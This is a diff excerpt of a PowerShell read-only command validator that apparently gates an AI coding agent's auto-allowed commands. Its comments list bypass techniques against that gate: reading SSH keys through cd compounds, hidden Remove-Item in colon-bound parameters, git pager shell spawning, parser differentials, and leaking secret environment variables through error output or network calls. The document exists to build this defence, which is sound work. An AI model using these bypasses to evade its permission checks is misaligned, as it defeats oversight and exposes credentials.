+ export function isSafeOutputCommand(name) {
953
+ const canonical = resolveToCanonical(name);
954
+ return SAFE_OUTPUT_CMDLETS.has(canonical);
955
+ }
956
+ /**
957
+ * Checks if a command element is a pipeline-tail transformer that was moved
958
+ * from SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST (PIPELINE_TAIL_CMDLETS set)
959
+ * AND passes its argLeaksValue guard via isAllowlistedCommand.
960
+ *
961
+ * Narrow fallback for isSafeOutputCommand call sites that need to keep the
962
+ * "skip harmless pipeline tail" behavior for Format-Table / Select-Object / etc.
963
+ * Does NOT match the full CMDLET_ALLOWLIST — only the migrated transformers.
964
+ */
965
+ export function isAllowlistedPipelineTail(cmd, originalCommand) {
966
+ const canonical = resolveToCanonical(cmd.name);
967
+ if (!PIPELINE_TAIL_CMDLETS.has(canonical)) {
968
+ return false;
969
+ }
970
+ return isAllowlistedCommand(cmd, originalCommand);
971
+ }
972
+ /**
973
+ * Fail-closed gate for read-only auto-allow. Returns true ONLY for a
974
+ * PipelineAst where every element is a CommandAst — the one statement
975
+ * shape we can fully validate. Everything else (assignments, control
976
+ * flow, expression sources, chain operators) defaults to false.
977
+ *
978
+ * Single code path to true. New AST types added to PowerShell fall
979
+ * through to false by construction.
980
+ */
981
+ export function isProvablySafeStatement(stmt) {
982
+ if (stmt.statementType !== 'PipelineAst')
983
+ return false;
984
+ // Empty commands → vacuously passes the loop below. PowerShell's
985
+ // parser guarantees PipelineAst.PipelineElements ≥ 1 for valid source,
986
+ // but this gate is the linchpin — defend against parser/JSON edge cases.
987
+ if (stmt.commands.length === 0)
988
+ return false;
989
+ for (const cmd of stmt.commands) {
990
+ if (cmd.elementType !== 'CommandAst')
991
+ return false;
992
+ }
993
+ return true;
994
+ }
995
+ /**
996
+ * Looks up a command in the allowlist, resolving aliases first.
997
+ * Returns the config if found, or undefined.
998
+ */
999
+ function lookupAllowlist(name) {
1000
+ const lower = name.toLowerCase();
1001
+ // Direct lookup first
1002
+ const direct = CMDLET_ALLOWLIST[lower];
1003
+ if (direct) {
1004
+ return direct;
1005
+ }
1006
+ // Resolve alias to canonical and look up
1007
+ const canonical = resolveToCanonical(lower);
1008
+ if (canonical !== lower) {
1009
+ return CMDLET_ALLOWLIST[canonical];
1010
+ }
1011
+ return undefined;
1012
+ }
1013
+ /**
1014
+ * Sync regex-based check for security-concerning patterns in a PowerShell command.
1015
+ * Used by isReadOnly (which must be sync) as a fast pre-filter before the
1016
+ * cmdlet allowlist check. This mirrors BashTool's checkReadOnlyConstraints
1017
+ * which checks bashCommandIsSafe_DEPRECATED before evaluating read-only status.
1018
+ *
1019
+ * Returns true if the command contains patterns that indicate it should NOT
1020
+ * be considered read-only, even if the cmdlet is in the allowlist.
1021
+ */
1022
+ export function hasSyncSecurityConcerns(command) {
1023
+ const trimmed = command.trim();
1024
+ if (!trimmed) {
1025
+ return false;
1026
+ }
1027
+ // Subexpressions: $(...) can execute arbitrary code
1028
+ if (/\$\(/.test(trimmed)) {
1029
+ return true;
1030
+ }
1031
+ // Splatting: @variable passes arbitrary parameters. Real splatting is
1032
+ // token-start only — `@` preceded by whitespace/separator/start, not mid-word.
1033
+ // `[^\w.]` excludes word chars and `.` so `user@example.com` (email) and
1034
+ // `file.@{u}` don't match, but ` @splat` / `;@splat` / `^@splat` do.
1035
+ if (/(?:^|[^\w.])@\w+/.test(trimmed)) {
1036
+ return true;
1037
+ }
1038
+ // Member invocations: .Method() can call arbitrary .NET methods
1039
+ if (/\.\w+\s*\(/.test(trimmed)) {
1040
+ return true;
1041
+ }
1042
+ // Assignments: $var = ... can modify state
1043
+ if (/\$\w+\s*[+\-*/]?=/.test(trimmed)) {
1044
+ return true;
1045
+ }
1046
+ // Stop-parsing symbol: --% passes everything raw to native commands
1047
+ if (/--%/.test(trimmed)) {
1048
+ return true;
1049
+ }
1050
+ // UNC paths: \\server\share or //server/share can trigger network requests
1051
+ // and leak NTLM/Kerberos credentials
1052
+ // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search, short command strings
1053
+ if (/\\\\/.test(trimmed) || /(?<!:)\/\//.test(trimmed)) {
1054
+ return true;
1055
+ }
1056
+ // Static method calls: [Type]::Method() can invoke arbitrary .NET methods
1057
+ if (/::/.test(trimmed)) {
1058
+ return true;
1059
+ }
1060
+ return false;
1061
+ }
1062
+ /**
1063
+ * Checks if a PowerShell command is read-only based on the cmdlet allowlist.
1064
+ *
1065
+ * @param command - The original PowerShell command string
1066
+ * @param parsed - The AST-parsed representation of the command
1067
+ * @returns true if the command is read-only, false otherwise
1068
+ */
1069
+ export function isReadOnlyCommand(command, parsed) {
1070
+ const trimmedCommand = command.trim();
1071
+ if (!trimmedCommand) {
1072
+ return false;
1073
+ }
1074
+ // If no parsed AST available, conservatively return false
1075
+ if (!parsed) {
1076
+ return false;
1077
+ }
1078
+ // If parsing failed, reject
1079
+ if (!parsed.valid) {
1080
+ return false;
1081
+ }
1082
+ const security = deriveSecurityFlags(parsed);
1083
+ // Reject commands with script blocks — we can't verify the code inside them
1084
+ // e.g., Get-Process | ForEach-Object { Remove-Item C:\foo } looks like a safe pipeline
1085
+ // but the script block contains destructive code
1086
+ if (security.hasScriptBlocks ||
1087
+ security.hasSubExpressions ||
1088
+ security.hasExpandableStrings ||
1089
+ security.hasSplatting ||
1090
+ security.hasMemberInvocations ||
1091
+ security.hasAssignments ||
1092
+ security.hasStopParsing) {
1093
+ return false;
1094
+ }
1095
+ const segments = getPipelineSegments(parsed);
1096
+ if (segments.length === 0) {
1097
+ return false;
1098
+ }
1099
+ // SECURITY: Block compound commands that contain a cwd-changing cmdlet
1100
+ // (Set-Location/Push-Location/Pop-Location/New-PSDrive) alongside any other
1101
+ // statement. This was previously scoped to cd+git only, but that overlooked
1102
+ // the isReadOnlyCommand auto-allow path for cd+read compounds (finding #27):
1103
+ // Set-Location ~; Get-Content ./.ssh/id_rsa
1104
+ // Both cmdlets are in CMDLET_ALLOWLIST, so without this guard the compound
1105
+ // auto-allows. Path validation resolved ./.ssh/id_rsa against the STALE
1106
+ // validator cwd (e.g. /project), missing any Read(~/.ssh/**) deny rule.
1107
+ // At runtime PowerShell cd's to ~, reads ~/.ssh/id_rsa.
1108
+ //
1109
+ // Any compound containing a cwd-changing cmdlet cannot be auto-classified
1110
+ // read-only when other statements may use relative paths — those paths
1111
+ // resolve differently at runtime than at validation time. BashTool has the
1112
+ // equivalent guard via compoundCommandHasCd threading into path validation.
1113
+ const totalCommands = segments.reduce((sum, seg) => sum + seg.commands.length, 0);
1114
+ if (totalCommands > 1) {
1115
+ const hasCd = segments.some(seg => seg.commands.some(cmd => isCwdChangingCmdlet(cmd.name)));
1116
+ if (hasCd) {
1117
+ return false;
1118
+ }
1119
+ }
1120
+ // Check each statement individually - all must be read-only
1121
+ for (const pipeline of segments) {
1122
+ if (!pipeline || pipeline.commands.length === 0) {
1123
+ return false;
1124
+ }
1125
+ // Reject file redirections (writing to files). `> $null` discards output
1126
+ // and is not a filesystem write, so it doesn't disqualify read-only status.
1127
+ if (pipeline.redirections.length > 0) {
1128
+ const hasFileRedirection = pipeline.redirections.some(r => !r.isMerging && !isNullRedirectionTarget(r.target));
1129
+ if (hasFileRedirection) {
1130
+ return false;
1131
+ }
1132
+ }
1133
+ // First command must be in the allowlist
1134
+ const firstCmd = pipeline.commands[0];
1135
+ if (!firstCmd) {
1136
+ return false;
1137
+ }
1138
+ if (!isAllowlistedCommand(firstCmd, command)) {
1139
+ return false;
1140
+ }
1141
+ // Remaining pipeline commands must be safe output cmdlets OR allowlisted
1142
+ // (with arg validation). Format-Table/Measure-Object moved from
1143
+ // SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST after security review found all
1144
+ // accept calculated-property hashtables. isAllowlistedCommand runs their
1145
+ // argLeaksValue callback: bare `| Format-Table` passes, `| Format-Table
1146
+ // $env:SECRET` fails. SECURITY: nameType gate catches 'scripts\\Out-Null'
1147
+ // (raw name has path chars → 'application'). cmd.name is stripped to
1148
+ // 'Out-Null' which would match SAFE_OUTPUT_CMDLETS, but PowerShell runs
1149
+ // scripts\\Out-Null.ps1.
1150
+ for (let i = 1; i < pipeline.commands.length; i++) {
1151
+ const cmd = pipeline.commands[i];
1152
+ if (!cmd || cmd.nameType === 'application') {
1153
+ return false;
1154
+ }
1155
+ // SECURITY: isSafeOutputCommand is name-only; only short-circuit for
1156
+ // zero-arg invocations. Out-String -InputObject:(rm x) — the paren is
1157
+ // evaluated when Out-String runs. With name-only check and args, the
1158
+ // colon-bound paren bypasses. Force isAllowlistedCommand (arg validation)
1159
+ // when args present — Out-String/Out-Null/Out-Host are NOT in
1160
+ // CMDLET_ALLOWLIST so any args will reject.
1161
+ // PoC: Get-Process | Out-String -InputObject:(Remove-Item /tmp/x)
1162
+ // → auto-allow → Remove-Item runs.
1163
+ if (isSafeOutputCommand(cmd.name) && cmd.args.length === 0) {
1164
+ continue;
1165
+ }
1166
+ if (!isAllowlistedCommand(cmd, command)) {
1167
+ return false;
1168
+ }
1169
+ }
1170
+ // SECURITY: Reject statements with nested commands. nestedCommands are
1171
+ // CommandAst nodes found inside script block arguments, ParenExpressionAst
1172
+ // children of colon-bound parameters, or other non-top-level positions.
1173
+ // A statement with nestedCommands is by definition not a simple read-only
1174
+ // invocation — it contains executable sub-pipelines that bypass the
1175
+ // per-command allowlist check above.
1176
+ if (pipeline.nestedCommands && pipeline.nestedCommands.length > 0) {
1177
+ return false;
1178
+ }
1179
+ }
1180
+ return true;
1181
+ }
1182
+ /**
1183
+ * Checks if a single command element is in the allowlist and passes flag validation.
1184
+ */
1185
+ export function isAllowlistedCommand(cmd, originalCommand) {
1186
+ // SECURITY: nameType is computed from the raw (pre-stripModulePrefix) name.
1187
+ // 'application' means the raw name contains path chars (. \\ /) — e.g.
1188
+ // 'scripts\\Get-Process', './git', 'node.exe'. PowerShell resolves these as
1189
+ // file paths, not as the cmdlet/command the stripped name matches. Never
1190
+ // auto-allow: the allowlist was built for cmdlets, not arbitrary scripts.
1191
+ // Known collateral: 'Microsoft.PowerShell.Management\\Get-ChildItem' also
1192
+ // classifies as 'application' (contains . and \\) and will prompt. Acceptable
1193
+ // since module-qualified names are rare in practice and prompting is safe.
1194
+ if (cmd.nameType === 'application') {
1195
+ // Bypass for explicit safe .exe names (bash `which` parity — see
1196
+ // SAFE_EXTERNAL_EXES). SECURITY: match the raw first token of cmd.text,
1197
+ // not cmd.name. stripModulePrefix collapses scripts\where.exe →
1198
+ // cmd.name='where.exe', but cmd.text preserves 'scripts\where.exe ...'.
1199
+ const rawFirstToken = cmd.text.split(/\s/, 1)[0]?.toLowerCase() ?? '';
1200
+ if (!SAFE_EXTERNAL_EXES.has(rawFirstToken)) {
1201
+ return false;
1202
+ }
1203
+ // Fall through to lookupAllowlist — CMDLET_ALLOWLIST['where.exe'] handles
1204
+ // flag validation (empty config = all flags OK, matching bash's `which`).
1205
+ }
1206
+ const config = lookupAllowlist(cmd.name);
1207
+ if (!config) {
1208
+ return false;
1209
+ }
1210
+ // If there's a regex constraint, check it against the original command
1211
+ if (config.regex && !config.regex.test(originalCommand)) {
1212
+ return false;
1213
+ }
1214
+ // If there's an additional callback, check it
1215
+ if (config.additionalCommandIsDangerousCallback?.(originalCommand, cmd)) {
1216
+ return false;
1217
+ }
1218
+ // SECURITY: whitelist arg elementTypes — only StringConstant and Parameter
1219
+ // are statically verifiable. Everything else expands/evaluates at runtime:
1220
+ // 'Variable' → `Get-Process $env:AWS_SECRET_ACCESS_KEY` expands,
1221
+ // errors "Cannot find process 'sk-ant-...'", model
1222
+ // reads the secret from the error
1223
+ // 'Other' (Hashtable) → `Get-Process @{k=$env:SECRET}` same leak
1224
+ // 'Other' (Convert) → `Get-Process [string]$env:SECRET` same leak
1225
+ // 'Other' (BinaryExpr)→ `Get-Process ($env:SECRET + '')` same leak
1226
+ // 'SubExpression' → arbitrary code (already caught by deriveSecurityFlags
1227
+ // at the isReadOnlyCommand layer, but isAllowlistedCommand
1228
+ // is also called from checkPermissionMode directly)
1229
+ // hasSyncSecurityConcerns misses bare $var (only matches `$(`/@var/.Method(/
1230
+ // $var=/--%/::); deriveSecurityFlags has no 'Variable' case; the safeFlags
1231
+ // loop below validates flag NAMES but not positional arg TYPES. File cmdlets
1232
+ // (CMDLET_PATH_CONFIG) are already protected by SAFE_PATH_ELEMENT_TYPES in
1233
+ // pathValidation.ts — this closes the gap for non-file cmdlets (Get-Process,
1234
+ // Get-Service, Get-Command, ~15 others). PS equivalent of Bash's blanket `$`
1235
+ // token check at BashTool/readOnlyValidation.ts:~1356.
1236
+ //
1237
+ // Placement: BEFORE external-command dispatch so git/gh/docker/dotnet get
1238
+ // this too (defense-in-depth with their string-based `$` checks; catches
1239
+ // @{...}/[cast]/($a+$b) that `$` substring misses). In PS argument mode,
1240
+ // bare `5` tokenizes as StringConstant (BareWord), not a numeric literal,
1241
+ // so `git log -n 5` passes.
1242
+ //
1243
+ // SECURITY: elementTypes undefined → fail-closed. The real parser always
1244
+ // sets it (parser.ts:769/781/812), so undefined means an untrusted or
1245
+ // malformed element. Previously skipped (fail-open) for test-helper
1246
+ // convenience; test helpers now set elementTypes explicitly.
1247
+ // elementTypes[0] is the command name; args start at elementTypes[1].
1248
+ if (!cmd.elementTypes) {
1249
+ return false;
1250
+ }
1251
+ {
1252
+ for (let i = 1; i < cmd.elementTypes.length; i++) {
1253
+ const t = cmd.elementTypes[i];
1254
+ if (t !== 'StringConstant' && t !== 'Parameter') {
1255
+ // ArrayLiteralAst (`Get-Process Name, Id`) maps to 'Other'. The
1256
+ // leak vectors enumerated above all have a metachar in their extent
1257
+ // text: Hashtable `@{`, Convert `[`, BinaryExpr-with-var `$`,
1258
+ // ParenExpr `(`. A bare comma-list of identifiers has none.
1259
+ if (!/[$(@{[]/.test(cmd.args[i - 1] ?? '')) {
1260
+ continue;
1261
+ }
1262
+ return false;
1263
+ }
1264
+ // Colon-bound parameter (`-Flag:$env:SECRET`) is a SINGLE
1265
+ // CommandParameterAst — the VariableExpressionAst is its .Argument
1266
+ // child, not a separate CommandElement, so elementTypes says 'Parameter'
1267
+ // and the whitelist above passes.
1268
+ //
1269
+ // Query the parser's children[] tree instead of doing
1270
+ // string-archaeology on the arg text. children[i-1] holds the
1271
+ // .Argument child's mapped type (aligned with args[i-1]).
1272
+ // Tree query catches MORE than the string check — e.g.
1273
+ // `-InputObject:@{k=v}` (HashtableAst → 'Other', no `$` in text),
1274
+ // `-Name:('payload' > file)` (ParenExpressionAst with redirection).
1275
+ // Fallback to the extended metachar check when children is undefined
1276
+ // (backward compat / test helpers that don't set it).
1277
+ if (t === 'Parameter') {
1278
+ const paramChildren = cmd.children?.[i - 1];
1279
+ if (paramChildren) {
1280
+ if (paramChildren.some(c => c.type !== 'StringConstant')) {
1281
+ return false;
1282
+ }
1283
+ }
1284
+ else {
1285
+ // Fallback: string-archaeology on arg text (pre-children parsers).
1286
+ // Reject `$` (variable), `(` (ParenExpressionAst), `@` (hash/array
1287
+ // sub), `{` (scriptblock), `[` (type literal/static method).
1288
+ const arg = cmd.args[i - 1] ?? '';
1289
+ const colonIdx = arg.indexOf(':');
1290
+ if (colonIdx > 0 && /[$(@{[]/.test(arg.slice(colonIdx + 1))) {
1291
+ return false;
1292
+ }
1293
+ }
1294
+ }
1295
+ }
1296
+ }
1297
+ const canonical = resolveToCanonical(cmd.name);
1298
+ // Handle external commands via shared validation
1299
+ if (canonical === 'git' ||
1300
+ canonical === 'gh' ||
1301
+ canonical === 'docker' ||
1302
+ canonical === 'dotnet') {
1303
+ return isExternalCommandSafe(canonical, cmd.args);
1304
+ }
1305
+ // On Windows, / is a valid flag prefix for native commands (e.g., findstr /S).
1306
+ // But PowerShell cmdlets always use - prefixed parameters, so /tmp is a path,
1307
+ // not a flag. We detect cmdlets by checking if the command resolves to a
1308
+ // Verb-Noun canonical name (either directly or via alias).
1309
+ const isCmdlet = canonical.includes('-');
1310
+ // SECURITY: if allowAllFlags is set, skip flag validation (command's entire
1311
+ // flag surface is read-only). Otherwise, missing/empty safeFlags means
1312
+ // "positional args only, reject all flags" — NOT "accept everything".
1313
+ if (config.allowAllFlags) {
1314
+ return true;
1315
+ }
1316
+ if (!config.safeFlags || config.safeFlags.length === 0) {
1317
+ // No safeFlags defined and allowAllFlags not set: reject any flags.
1318
+ // Positional-only args are still allowed (the loop below won't fire).
1319
+ // This is the safe default — commands must opt in to flag acceptance.
1320
+ const hasFlags = cmd.args.some((arg, i) => {
1321
+ if (isCmdlet) {
1322
+ return isPowerShellParameter(arg, cmd.elementTypes?.[i + 1]);
1323
+ }
1324
+ return (arg.startsWith('-') ||
1325
+ (process.platform === 'win32' && arg.startsWith('/')));
1326
+ });
1327
+ return !hasFlags;
1328
+ }
1329
+ // Validate that all flags used are in the allowlist.
1330
+ // SECURITY: use elementTypes as ground
1331
+ // truth for parameter detection. PowerShell's tokenizer accepts en-dash/
1332
+ // em-dash/horizontal-bar (U+2013/2014/2015) as parameter prefixes; a raw
1333
+ // startsWith('-') check misses `–ComputerName` (en-dash). The parser maps
1334
+ // CommandParameterAst → 'Parameter' regardless of dash char.
1335
+ // elementTypes[0] is the name element; args start at elementTypes[1].
1336
+ for (let i = 0; i < cmd.args.length; i++) {
1337
+ const arg = cmd.args[i];
1338
+ // For cmdlets: trust elementTypes (AST ground truth, catches Unicode dashes).
1339
+ // For native exes on Windows: also check `/` prefix (argv convention, not
1340
+ // tokenizer — the parser sees `/S` as a positional, not CommandParameterAst).
1341
+ const isFlag = isCmdlet
1342
+ ? isPowerShellParameter(arg, cmd.elementTypes?.[i + 1])
1343
+ : arg.startsWith('-') ||
1344
+ (process.platform === 'win32' && arg.startsWith('/'));
1345
+ if (isFlag) {
1346
+ // For cmdlets, normalize Unicode dash to ASCII hyphen for safeFlags
1347
+ // comparison (safeFlags entries are always written with ASCII `-`).
1348
+ // Native-exe safeFlags are stored with `/` (e.g. '/FO') — don't touch.
1349
+ let paramName = isCmdlet ? '-' + arg.slice(1) : arg;
1350
+ const colonIndex = paramName.indexOf(':');
1351
+ if (colonIndex > 0) {
1352
+ paramName = paramName.substring(0, colonIndex);
1353
+ }
1354
+ // -ErrorAction/-Verbose/-Debug etc. are accepted by every cmdlet via
1355
+ // [CmdletBinding()] and only route error/warning/progress streams —
1356
+ // they can't make a read-only cmdlet write. pathValidation.ts already
1357
+ // merges these into its per-cmdlet param sets (line ~1339); this is
1358
+ // the same merge for safeFlags. Without it, `Get-Content file.txt
1359
+ // -ErrorAction SilentlyContinue` prompts despite Get-Content being
1360
+ // allowlisted. Only for cmdlets — native exes don't have common params.
1361
+ const paramLower = paramName.toLowerCase();
1362
+ if (isCmdlet && COMMON_PARAMETERS.has(paramLower)) {
1363
+ continue;
1364
+ }
1365
+ const isSafe = config.safeFlags.some(flag => flag.toLowerCase() === paramLower);
1366
+ if (!isSafe) {
1367
+ return false;
1368
+ }
1369
+ }
1370
+ }
1371
+ return true;
1372
+ }
1373
+ // ---------------------------------------------------------------------------
1374
+ // External command validation (git, gh, docker) using shared configs
1375
+ // ---------------------------------------------------------------------------
1376
+ function isExternalCommandSafe(command, args) {
1377
+ switch (command) {
1378
+ case 'git':
1379
+ return isGitSafe(args);
1380
+ case 'gh':
1381
+ return isGhSafe(args);
1382
+ case 'docker':
1383
+ return isDockerSafe(args);
1384
+ case 'dotnet':
1385
+ return isDotnetSafe(args);
1386
+ default:
1387
+ return false;
1388
+ }
1389
+ }
1390
+ const DANGEROUS_GIT_GLOBAL_FLAGS = new Set([
1391
+ '-c',
1392
+ '-C',
1393
+ '--exec-path',
1394
+ '--config-env',
1395
+ '--git-dir',
1396
+ '--work-tree',
1397
+ // SECURITY: --attr-source creates a parser differential. Git treats the
1398
+ // token after the tree-ish value as a pathspec (not the subcommand), but
1399
+ // our skip-by-2 loop would treat it as the subcommand:
1400
+ // git --attr-source HEAD~10 log status
1401
+ // validator: advances past HEAD~10, sees subcmd=log → allow
1402
+ // git: consumes `log` as pathspec, runs `status` as the real subcmd
1403
+ // Verified with `GIT_TRACE=1 git --attr-source HEAD~10 log status` →
1404
+ // `trace: built-in: git status`. Reject outright rather than skip-by-2.
1405
+ '--attr-source',
1406
+ ]);
1407
+ // Git global flags that accept a separate (space-separated) value argument.
1408
+ // When the loop encounters one without an inline `=` value, it must skip the
1409
+ // next token so the value isn't mistaken for the subcommand.
1410
+ //
1411
+ // SECURITY: This set must be COMPLETE. Any value-consuming global flag not
1412
+ // listed here creates a parser differential: validator sees the value as the
1413
+ // subcommand, git consumes it and runs the NEXT token. Audited against
1414
+ // `man git` + GIT_TRACE for git 2.51; --list-cmds is `=`-only, booleans
1415
+ // (-p/--bare/--no-*/--*-pathspecs/--html-path/etc.) advance by 1 via the
1416
+ // default path. --attr-source REMOVED: it also triggers pathspec parsing,
1417
+ // creating a second differential — moved to DANGEROUS_GIT_GLOBAL_FLAGS above.
1418
+ const GIT_GLOBAL_FLAGS_WITH_VALUES = new Set([
1419
+ '-c',
1420
+ '-C',
1421
+ '--exec-path',
1422
+ '--config-env',
1423
+ '--git-dir',
1424
+ '--work-tree',
1425
+ '--namespace',
1426
+ '--super-prefix',
1427
+ '--shallow-file',
1428
+ ]);
1429
+ // Git short global flags that accept attached-form values (no space between
1430
+ // flag letter and value). Long options (--git-dir etc.) require `=` or space,
1431
+ // so the split-on-`=` check handles them. But `-ccore.pager=sh` and `-C/path`
1432
+ // need prefix matching: git parses `-c<name>=<value>` and `-C<path>` directly.
1433
+ const DANGEROUS_GIT_SHORT_FLAGS_ATTACHED = ['-c', '-C'];
1434
+ function isGitSafe(args) {
1435
+ if (args.length === 0) {
1436
+ return true;
1437
+ }
1438
+ // SECURITY: Reject any arg containing `$` (variable reference). Bare
1439
+ // VariableExpressionAst positionals reach here as literal text ($env:SECRET,
1440
+ // $VAR). deriveSecurityFlags does not gate bare Variable args. The validator
1441
+ // sees `$VAR` as text; PowerShell expands it at runtime. Parser differential:
1442
+ // git diff $VAR where $VAR = '--output=/tmp/evil'
1443
+ // → validator sees positional '$VAR' → validateFlags passes
1444
+ // → PowerShell runs `git diff --output=/tmp/evil` → file write
1445
+ // This generalizes the ls-remote inline `$` guard below to all git subcommands.
1446
+ // Bash equivalent: BashTool blanket
1447
+ // `$` rejection at readOnlyValidation.ts:~1352. isGhSafe has the same guard.
1448
+ for (const arg of args) {
1449
+ if (arg.includes('$')) {
1450
+ return false;
1451
+ }
1452
+ }
1453
+ // Skip over global flags before the subcommand, rejecting dangerous ones.
1454
+ // Flags that take space-separated values must consume the next token so it
1455
+ // isn't mistaken for the subcommand (e.g. `git --namespace foo status`).
1456
+ let idx = 0;
1457
+ while (idx < args.length) {
1458
+ const arg = args[idx];
1459
+ if (!arg || !arg.startsWith('-')) {
1460
+ break;
1461
+ }
1462
+ // SECURITY: Attached-form short flags. `-ccore.pager=sh` splits on `=` to
1463
+ // `-ccore.pager`, which isn't in DANGEROUS_GIT_GLOBAL_FLAGS. Git accepts
1464
+ // `-c<name>=<value>` and `-C<path>` with no space. We must prefix-match.
1465
+ // Note: `--cached`, `--config-env`, etc. already fail startsWith('-c') at
1466
+ // position 1 (`-` ≠ `c`). The `!== '-'` guard only applies to `-c`
1467
+ // (git config keys never start with `-`, so `-c-key` is implausible).
1468
+ // It does NOT apply to `-C` — directory paths CAN start with `-`, so
1469
+ // `git -C-trap status` must reject. `git -ccore.pager=sh log` spawns a shell.
1470
+ for (const shortFlag of DANGEROUS_GIT_SHORT_FLAGS_ATTACHED) {
1471
+ if (arg.length > shortFlag.length &&
1472
+ arg.startsWith(shortFlag) &&
1473
+ (shortFlag === '-C' || arg[shortFlag.length] !== '-')) {
1474
+ return false;
1475
+ }
1476
+ }
1477
+ const hasInlineValue = arg.includes('=');
1478
+ const flagName = hasInlineValue ? arg.split('=')[0] || '' : arg;
1479
+ if (DANGEROUS_GIT_GLOBAL_FLAGS.has(flagName)) {
1480
+ return false;
1481
+ }
1482
+ // Consume the next token if the flag takes a separate value
1483
+ if (!hasInlineValue && GIT_GLOBAL_FLAGS_WITH_VALUES.has(flagName)) {
1484
+ idx += 2;
1485
+ }
1486
+ else {
1487
+ idx++;
1488
+ }
1489
+ }
1490
+ if (idx >= args.length) {
1491
+ return true;
1492
+ }
1493
+ // Try multi-word subcommand first (e.g. 'stash list', 'config --get', 'remote show')
1494
+ const first = args[idx]?.toLowerCase() || '';
1495
+ const second = idx + 1 < args.length ? args[idx + 1]?.toLowerCase() || '' : '';
1496
+ // GIT_READ_ONLY_COMMANDS keys are like 'git diff', 'git stash list'
1497
+ const twoWordKey = `git ${first} ${second}`;
1498
+ const oneWordKey = `git ${first}`;
1499
+ let config = GIT_READ_ONLY_COMMANDS[twoWordKey];
1500
+ let subcommandTokens = 2;
1501
+ if (!config) {
1502
+ config = GIT_READ_ONLY_COMMANDS[oneWordKey];
1503
+ subcommandTokens = 1;
1504
+ }
1505
+ if (!config) {
1506
+ return false;
1507
+ }
1508
+ const flagArgs = args.slice(idx + subcommandTokens);
1509
+ // git ls-remote URL rejection — ported from BashTool's inline guard
1510
+ // (src/tools/BashTool/readOnlyValidation.ts:~962). ls-remote with a URL
1511
+ // is a data-exfiltration vector (encode secrets in hostname → DNS/HTTP).
1512
+ // Reject URL-like positionals: `://` (http/git protocols), `@` + `:` (SSH
1513
+ // git@host:path), and `$` (variable refs — $env:URL reaches here as the
1514
+ // literal string '$env:URL' when the arg's elementType is Variable; the
1515
+ // security-flag checks don't gate bare Variable positionals passed to
1516
+ // external commands).
1517
+ if (first === 'ls-remote') {
1518
+ for (const arg of flagArgs) {
1519
+ if (!arg.startsWith('-')) {
1520
+ if (arg.includes('://') ||
1521
+ arg.includes('@') ||
1522
+ arg.includes(':') ||
1523
+ arg.includes('$')) {
1524
+ return false;
1525
+ }
1526
+ }
1527
+ }
1528
+ }
1529
+ if (config.additionalCommandIsDangerousCallback &&
1530
+ config.additionalCommandIsDangerousCallback('', flagArgs)) {
1531
+ return false;
1532
+ }
1533
+ return validateFlags(flagArgs, 0, config, { commandName: 'git' });
1534
+ }
1535
+ function isGhSafe(args) {
1536
+ // gh commands are network-dependent; only allow for ant users
1537
+ if (process.env.USER_TYPE !== 'ant') {
1538
+ return false;
1539
+ }
1540
+ if (args.length === 0) {
1541
+ return true;
1542
+ }
1543
+ // Try two-word subcommand first (e.g. 'pr view')
1544
+ let config;
1545
+ let subcommandTokens = 0;
1546
+ if (args.length >= 2) {
1547
+ const twoWordKey = `gh ${args[0]?.toLowerCase()} ${args[1]?.toLowerCase()}`;
1548
+ config = GH_READ_ONLY_COMMANDS[twoWordKey];
1549
+ subcommandTokens = 2;
1550
+ }
1551
+ // Try single-word subcommand (e.g. 'gh version')
1552
+ if (!config && args.length >= 1) {
1553
+ const oneWordKey = `gh ${args[0]?.toLowerCase()}`;
1554
+ config = GH_READ_ONLY_COMMANDS[oneWordKey];
1555
+ subcommandTokens = 1;
1556
+ }
1557
+ if (!config) {
1558
+ return false;
1559
+ }
1560
+ const flagArgs = args.slice(subcommandTokens);
1561
+ // SECURITY: Reject any arg containing `$` (variable reference). Bare
1562
+ // VariableExpressionAst positionals reach here as literal text ($env:SECRET).
1563
+ // deriveSecurityFlags does not gate bare Variable args — only subexpressions,
1564
+ // splatting, expandable strings, etc. All gh subcommands are network-facing,
1565
+ // so a variable arg is a data-exfiltration vector:
1566
+ // gh search repos $env:SECRET_API_KEY
1567
+ // → PowerShell expands at runtime → secret sent to GitHub API.
1568
+ // git ls-remote has an equivalent inline guard; this generalizes it for gh.
1569
+ // Bash equivalent: BashTool blanket `$` rejection at readOnlyValidation.ts:~1352.
1570
+ for (const arg of flagArgs) {
1571
+ if (arg.includes('$')) {
1572
+ return false;
1573
+ }
1574
+ }
1575
+ if (config.additionalCommandIsDangerousCallback &&
1576
+ config.additionalCommandIsDangerousCallback('', flagArgs)) {
1577
+ return false;
1578
+ }
1579
+ return validateFlags(flagArgs, 0, config);
1580
+ }
1581
+ function isDockerSafe(args) {
1582
+ if (args.length === 0) {
1583
+ return true;
1584
+ }
1585
+ // SECURITY: blanket PowerShell `$` variable rejection. Same guard as
1586
+ // isGitSafe and isGhSafe. Parser differential: validator sees literal
1587
+ // '$env:X'; PowerShell expands at runtime. Runs BEFORE the fast-path
1588
+ // return — the previous location (after fast-path) never fired for
1589
+ // `docker ps`/`docker images`. The earlier comment claiming those take no
1590
+ // --format was wrong: `docker ps --format $env:AWS_SECRET_ACCESS_KEY`
1591
+ // auto-allowed, PowerShell expanded, docker errored with the secret in
1592
+ // its output, model read it. Check ALL args, not flagArgs — args[0]
1593
+ // (subcommand slot) could also be `$env:X`. elementTypes whitelist isn't
1594
+ // applicable here: this function receives string[] (post-stringify), not
1595
+ // ParsedCommandElement; the isAllowlistedCommand caller applies the
1596
+ // elementTypes gate one layer up.
1597
+ for (const arg of args) {
1598
+ if (arg.includes('$')) {
1599
+ return false;
1600
+ }
1601
+ }
1602
+ const oneWordKey = `docker ${args[0]?.toLowerCase()}`;
1603
+ // Fast path: EXTERNAL_READONLY_COMMANDS entries ('docker ps', 'docker images')
1604
+ // have no flag constraints — allow unconditionally (after $ guard above).
1605
+ if (EXTERNAL_READONLY_COMMANDS.includes(oneWordKey)) {
1606
+ return true;
1607
+ }
1608
+ // DOCKER_READ_ONLY_COMMANDS entries ('docker logs', 'docker inspect') have
1609
+ // per-flag configs. Mirrors isGhSafe: look up config, then validateFlags.
1610
+ const config = DOCKER_READ_ONLY_COMMANDS[oneWordKey];
1611
+ if (!config) {
1612
+ return false;
1613
+ }
1614
+ const flagArgs = args.slice(1);
1615
+ if (config.additionalCommandIsDangerousCallback &&
1616
